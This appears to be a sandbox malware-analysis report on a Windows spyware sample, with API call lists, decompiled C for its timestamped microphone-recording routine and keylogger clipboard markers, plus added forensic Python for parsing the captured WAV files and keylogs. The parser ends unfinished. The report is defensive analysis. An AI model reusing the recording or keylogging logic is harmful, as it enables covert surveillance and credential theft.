                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040163C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401645
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040164E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401657
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401663
                                          • waveInUnprepareHeader.WINMM(-0041519C,00000020), ref: 00401680
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004016A5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004016EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@V10@@closesocketwave
                                          • String ID: playaudio
                                          • API String ID: 2056009259-1314764895
                                          • Opcode ID: 3742e07a2a259b882a403f627092aaa57361fb2f085af106636733a191568580
                                          • Instruction ID: 76c54256c40fbbf35d32c407d69db5079ebfec01750c77bb5de673180f13f9b1
                                          • Opcode Fuzzy Hash: 3742e07a2a259b882a403f627092aaa57361fb2f085af106636733a191568580
                                          • Instruction Fuzzy Hash: 2F416F72900109ABDB01EBA0ED4EADE777CFB55305F104176F506E21A1EE785E48CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00415A30,00000000), ref: 004022FC
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 00402314
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402323
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040232D
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00402346
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040234F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040235D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415A60), ref: 0040236E
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040238E
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 004023A6
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004023B8
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,73115DF0), ref: 004023CE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023D8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E1
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004023F2
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023FC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402405
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402419
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040242F
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040243A
                                          • CreateThread.KERNEL32 ref: 0040244B
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402456
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040FC60,73115DF0), ref: 0040246B
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402475
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040247E
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402487
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402499
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004024A7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@D@1@@EventObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2944316355-0
                                          • Opcode ID: aad691de20132ca68f57e677d5fc682d1c060bbf91795a29eecf0d4de655ffa4
                                          • Instruction ID: 8ff35d7655066902be5676fb1ff2957b2f75ed0f81b6480087796954eca2c198
                                          • Opcode Fuzzy Hash: aad691de20132ca68f57e677d5fc682d1c060bbf91795a29eecf0d4de655ffa4
                                          • Instruction Fuzzy Hash: 3E51FB7150020AEFCB049FA4ED9DDEE7F79FF44345B00816AF546A21A0DFB49989CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00401A91,00000022,00000001,?,00415160), ref: 00401710
                                          • ?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,00415160), ref: 00401765
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(RIFF,00000004,?,00415160), ref: 0040177A
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000004,?,00415160), ref: 0040178B
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(WAVE,00000004,?,00415160), ref: 0040179D
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(fmt ,00000004,?,00415160), ref: 004017AF
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000010,00000004,?,00415160), ref: 004017C0
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000002,?,00415160), ref: 004017D2
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DA,00000002,?,00415160), ref: 004017E5
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DC,00000004,?,00415160), ref: 004017F7
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,00000004,?,00415160), ref: 00401808
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000002,?,00415160), ref: 0040181A
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151E6,00000002,?,00415160), ref: 0040182D
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(data,00000004,?,00415160), ref: 0040183F
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000004,?,00415160), ref: 00401850
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,?,?,00415160), ref: 00401861
                                          • ?close@?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,00415160), ref: 0040186D
                                          • ??_D?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,00415160), ref: 00401879
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@@std@@U?$char_traits@$V12@$?write@?$basic_ostream@$??0?$basic_fstream@?close@?$basic_fstream@?seekp@?$basic_ostream@D?$basic_fstream@W4seekdir@ios_base@2@@
                                          • String ID: RIFF$WAVE$data$fmt
                                          • API String ID: 766087772-4212202414
                                          • Opcode ID: 52a0db0d95ad37626374cffde14f3dfd6f79d3945ae441a7bf68ff1ddc81c4b6
                                          • Instruction ID: d7aee1695a5c952c579fb531cba5a3b8ffd14c1b073e8637df3e8a3bae7d5bfd
                                          • Opcode Fuzzy Hash: 52a0db0d95ad37626374cffde14f3dfd6f79d3945ae441a7bf68ff1ddc81c4b6
                                          • Instruction Fuzzy Hash: A1410931A0121DEFDB24DB60DC4DFDA7B78FB59701F5080A9F156A20A0DBB05A84CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 22%
                                          			E004019AA(intOrPtr _a8, char _a11) {
                                          				char _v5;
                                          				char _v12;
                                          				void* _v28;
                                          				char _v44;
                                          				char _v60;
                                          				void* _v76;
                                          				char _v92;
                                          				char _v172;
                                          				int _t21;
                                          				char* _t23;
                                          				char* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char _t31;
                                          				CHAR* _t33;
                                          				intOrPtr _t34;
                                          				void* _t49;
                                          
                                          				_t21 =  &_v5;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t21);
                                          				if(_a8 == 0x3c0) {
                                          					__imp__time( &_v12, _t49);
                                          					_t23 =  &_v12;
                                          					__imp__localtime(_t23);
                                          					__imp__strftime( &_v172, 0x50, "%Y-%m-%d %H.%M", _t23);
                                          					puts( &_v172);
                                          					_t28 =  &_v172;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t28,  &_a11, ".wav");
                                          					_t29 =  &_v60;
                                          					L0040FC26();
                                          					_t30 =  &_v92;
                                          					L0040FC14();
                                          					_t31 =  &_v44;
                                          					L0040FC20();
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t31, _t31, _t30, _t30, _t29, _t29, 0x4151a8, 0x5c, _t28);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					E004016F6(_t31, 0x415160);
                                          					_t33 = waveInUnprepareHeader( *0x4151d0, 0x415160, 0x20);
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					0x415160->lpData = _t33;
                                          					_t34 =  *0x415198; // 0x0
                                          					 *0x415164 = _t34;
                                          					 *0x415168 = 0;
                                          					 *0x41516c = 0;
                                          					 *0x415170 = 0;
                                          					 *0x415174 = 0;
                                          					waveInPrepareHeader( *0x4151d0, 0x415160, 0x20);
                                          					_t21 = waveInAddBuffer( *0x4151d0, 0x415160, 0x20);
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t21;
                                          			}

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004019BA
                                          • time.MSVCRT ref: 004019D2
                                          • localtime.MSVCRT ref: 004019DC
                                          • strftime.MSVCRT ref: 004019F1
                                          • puts.MSVCRT ref: 004019FE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,.wav), ref: 00401A1A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,004151A8,0000005C,00000000), ref: 00401A2C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00401A39
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 00401A46
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401A52
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A5B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A64
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A6D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A76
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415160,?,?,?,?,?,?,?,?,00000000), ref: 00401A85
                                            • Part of subcall function 004016F6: ??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00401A91,00000022,00000001,?,00415160), ref: 00401710
                                            • Part of subcall function 004016F6: ?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,00415160), ref: 00401765
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(RIFF,00000004,?,00415160), ref: 0040177A
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000004,?,00415160), ref: 0040178B
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(WAVE,00000004,?,00415160), ref: 0040179D
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(fmt ,00000004,?,00415160), ref: 004017AF
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000010,00000004,?,00415160), ref: 004017C0
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000002,?,00415160), ref: 004017D2
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DA,00000002,?,00415160), ref: 004017E5
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DC,00000004,?,00415160), ref: 004017F7
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,00000004,?,00415160), ref: 00401808
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000002,?,00415160), ref: 0040181A
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151E6,00000002,?,00415160), ref: 0040182D
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(data,00000004,?,00415160), ref: 0040183F
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000004,?,00415160), ref: 00401850
                                            • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,?,?,00415160), ref: 00401861
                                          • waveInUnprepareHeader.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401A9C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00401AA7
                                          • waveInPrepareHeader.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401ADB
                                          • waveInAddBuffer.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401AEA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00000000), ref: 00401AF4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$D@std@@@std@@$V12@V?$allocator@$?write@?$basic_ostream@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@wave$??0?$basic_string@?c_str@?$basic_string@D@1@@HeaderV10@$??0?$basic_fstream@??4?$basic_string@?seekp@?$basic_ostream@BufferPrepareUnprepareV01@V01@@V10@0@W4seekdir@ios_base@2@@localtimeputsstrftimetime
                                          • String ID: %Y-%m-%d %H.%M$.wav
                                          • API String ID: 866339126-3597965672
                                          • Opcode ID: e336fa7229d51b92b370b467780b3a0970c49e63df0d216bebf50965dbcfc115
                                          • Instruction ID: a5d7e3b402908acd5397dec8a66d2258045444051812afed8a23243a24f6b54c
                                          • Opcode Fuzzy Hash: e336fa7229d51b92b370b467780b3a0970c49e63df0d216bebf50965dbcfc115
                                          • Instruction Fuzzy Hash: 3431AA71D40209FFDB51DBA0EC4DADE7B78EB44305F448476F609E21A0EBB49589CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%
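The API sequence above (time/localtime/strftime with "%Y-%m-%d %H.%M" and ".wav", then a fixed run of ostream::write calls emitting RIFF, a size, WAVE, "fmt ", 0x10, six format fields, "data" and a size, before waveInPrepareHeader/waveInAddBuffer) is the recorder creating a timestamped microphone capture with a canonical 44-byte PCM WAV header. Added example, not part of the sandbox report or of the sample: a Python validator for recovered capture files and their filenames. The field order is the standard PCM WAV layout; the listing does not establish that the writer fills every size field consistently (one 4-byte field is written as 0 in the static view), so size and rate inconsistencies are reported as anomalies rather than rejected, and the sample file is constructed.

```python
"""Validate audio capture files laid out like the recorder above writes them:
"<%Y-%m-%d %H.%M>.wav" with RIFF/WAVE, a 16-byte "fmt " chunk and "data"."""
import re
import struct
from datetime import datetime

# 44-byte canonical PCM WAV header; field order matches the sequence of
# ostream::write calls in the recorder (RIFF, size, WAVE, "fmt ", 16, ...).
HEADER_FMT = "<4sI4s4sIHHIIHH4sI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 44

# Filename produced by strftime("%Y-%m-%d %H.%M") + ".wav"
NAME_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}\.\d{2})\.wav$")


def parse_recording_name(name):
    """Return the capture start time encoded in the filename, or None."""
    m = NAME_RE.match(name)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%Y-%m-%d %H.%M")


def parse_wav_header(blob):
    """Parse the header and return (fields, anomalies).

    Tag mismatches raise; size/rate inconsistencies are only reported,
    because a sloppy writer still produces files most players accept."""
    if len(blob) < HEADER_LEN:
        raise ValueError("shorter than a 44-byte WAV header")
    (riff, riff_size, wave, fmt_tag, fmt_len, audio_fmt, channels,
     sample_rate, byte_rate, block_align, bits, data_tag,
     data_size) = struct.unpack_from(HEADER_FMT, blob)
    if (riff, wave, fmt_tag, data_tag) != (b"RIFF", b"WAVE", b"fmt ", b"data"):
        raise ValueError("not a RIFF/WAVE file with fmt+data chunks at fixed offsets")
    if fmt_len != 16:
        raise ValueError("fmt chunk is not the 16-byte PCM layout")
    fields = {
        "audio_format": audio_fmt, "channels": channels,
        "sample_rate": sample_rate, "byte_rate": byte_rate,
        "block_align": block_align, "bits_per_sample": bits,
        "data_size": data_size,
    }
    anomalies = []
    expected_block = channels * bits // 8
    if block_align != expected_block:
        anomalies.append("block_align %d != %d" % (block_align, expected_block))
    if byte_rate != sample_rate * expected_block:
        anomalies.append("byte_rate %d != %d" % (byte_rate, sample_rate * expected_block))
    if data_size != len(blob) - HEADER_LEN:
        anomalies.append("data_size %d != payload %d" % (data_size, len(blob) - HEADER_LEN))
    if riff_size != len(blob) - 8:
        anomalies.append("riff_size %d != file-8 %d" % (riff_size, len(blob) - 8))
    if audio_fmt != 1:
        anomalies.append("audio_format %d is not PCM" % audio_fmt)
    return fields, anomalies


def build_sample_wav(payload, sample_rate=8000, channels=1, bits=16, byte_rate=None):
    """Constructed test input, not a real capture: PCM header plus payload.
    byte_rate can be forced to mimic a writer that stores 0 in that field."""
    block = channels * bits // 8
    if byte_rate is None:
        byte_rate = sample_rate * block
    header = struct.pack(HEADER_FMT, b"RIFF", 36 + len(payload), b"WAVE",
                         b"fmt ", 16, 1, channels, sample_rate, byte_rate,
                         block, bits, b"data", len(payload))
    return header + payload


if __name__ == "__main__":
    print(parse_recording_name("2021-04-29 09.15.wav"))
    print(parse_wav_header(build_sample_wav(b"\x00" * 32)))
    print(parse_wav_header(build_sample_wav(b"\x00" * 32, byte_rate=0)))
```

The anomaly list is the useful output when triaging a directory of captures: a consistent set of "byte_rate 0" anomalies across files fingerprints the writer, while a data_size mismatch usually means the recorder was killed before it rewrote the sizes.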

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108C8,?,00000000,?,774273F0,?), ref: 00404E88
                                          • toupper.MSVCRT ref: 00404E97
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 00404EAB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00404EB6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404ED2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EDB
                                          • toupper.MSVCRT ref: 00404F6E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00404EC0
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                            • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                            • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,774273F0,?), ref: 00404EE4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,774273F0,?), ref: 00404F0E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,774273F0,?), ref: 00404F18
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,774273F0,?), ref: 00404F2A
                                          • tolower.MSVCRT ref: 00404F47
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00404FCC
                                          Strings
                                          • [End of clipboard text], xrefs: 00404EF9
                                          • [Ctrl + , xrefs: 00404EA3
                                          • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 00404F08
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                          • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                          • API String ID: 1567161615-221715050
                                          • Opcode ID: ebe4a0bf43562a0afdd6dc53c6e2911bed2e0ef583fe473b2b6e8d7be5cd96cd
                                          • Instruction ID: 0a172b601888657c7187d64dec92691b116b1295abc4ce990af629de97d6fe53
                                          • Opcode Fuzzy Hash: ebe4a0bf43562a0afdd6dc53c6e2911bed2e0ef583fe473b2b6e8d7be5cd96cd
                                          • Instruction Fuzzy Hash: 5641E7B1904209BFDB14E7E4DD499EE7B78EB40300F10447BF502A2191DA789F498759
                                          Uniqueness

                                          Uniqueness Score: -1.00%
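The strings in this block (" [Ctrl + " followed by an upper-cased key, " [Ctrl + V][Following text has been pasted from clipboard:]" and "[End of clipboard text]") are the markers the keylogger emits when it records a Ctrl combination and, on paste, the clipboard contents, before handing the text to the log writer at 00403A9A (SetEvent). Added example, not from the report or from the sample: a Python parser that turns a recovered log into typed text, Ctrl-key events and paste events, so pasted credentials can be pulled out directly. Assumptions: the " [Ctrl + " prefix is closed with "]" right after the key letter (the closing string is not shown in the listing), and the sample log is constructed.

```python
"""Parse a keylog that uses the Ctrl/clipboard markers seen in the listing."""
import re

# Markers exactly as they appear in the listing (note the leading space).
PASTE_START = " [Ctrl + V][Following text has been pasted from clipboard:]"
PASTE_END = "[End of clipboard text]"
# Assumption: " [Ctrl + " + toupper(key) is closed with "]".
CTRL_RE = re.compile(r" \[Ctrl \+ ([A-Z])\]")

# Constructed sample log, not a real capture.
SAMPLE_LOG = ("user@example.test [Ctrl + A]hunter2"
              + PASTE_START + "pasted-secret-value" + PASTE_END + "\n")


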